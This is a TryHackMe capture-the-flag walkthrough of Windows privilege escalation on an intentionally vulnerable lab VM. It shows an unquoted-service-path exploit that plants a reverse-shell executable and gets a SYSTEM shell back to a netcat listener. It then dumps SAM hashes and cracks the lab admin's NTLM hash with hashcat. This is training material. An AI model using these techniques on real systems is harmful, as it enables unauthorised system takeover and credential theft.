Windows PrivEsc
- 🌐 Website: TryHackMe
- 🔥 Level: Medium
- 🖥️ OS: Windows
- 🔗 Link: Windows PrivEsc
Description
This room is aimed at walking you through a variety of Windows Privilege Escalation techniques. To do this, you must first deploy an intentionally vulnerable Windows VM. This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Windows Privilege Escalation for OSCP and Beyond! course on Udemy. Full explanations of the various techniques used in this room are available there, along with demos and tips for finding privilege escalations in Windows.
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!
RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321":
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.184.79
The next tasks will walk you through different privilege escalation techniques. After each technique, you should have a admin or SYSTEM shell. Remember to exit out of the shell and/or re-establish a session as the "user" account before starting the next task!
We have this credentials: user:password321
❓Question¶
What is the original BINARY_PATH_NAME of the daclsvc service?
📋 Walkthrough¶
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\PrivEsc>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>
Answer
C:\Program Files\DACL Service\daclservice.exe
❓Question¶
What is the BINARY_PATH_NAME of the unquotedsvc service?
📋 Walkthrough¶
C:\PrivEsc>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net stat unquotedsvc
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ sudo nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.1.152] from (UNKNOWN) [10.10.174.230] 49724
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Answer
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
❓Question¶
What is the NTLM hash of the admin user?
📋 Walkthrough¶
Copio dalla cartella C:\Windows\Repair i due file SAM e SYSTEM nella mia kali e li dumpo usando creddump7\pwndump.py
┌──(kali㉿kali)-[/usr/share/creddump7]
└─$ python3 pwdump.py /home/kali/Desktop/THM/SYSTEM /home/kali/Desktop/THM/SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: ┌──(kali㉿kali)-[~/Desktop/THM]
└─$ echo "admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::"> hash
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 6 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
a9fdfa038c4b75ebc76dc855dd74f0da:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: a9fdfa038c4b75ebc76dc855dd74f0da
Time.Started.....: Sat Mar 29 19:51:49 2025 (1 sec)
Time.Estimated...: Sat Mar 29 19:51:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5616.2 kH/s (0.62ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 280789
Hardware.Mon.#1..: Temp: 37c Util: 5%
Started: Sat Mar 29 19:51:49 2025
Stopped: Sat Mar 29 19:51:51 2025
admin:password123
Answer
a9fdfa038c4b75ebc76dc855dd74f0da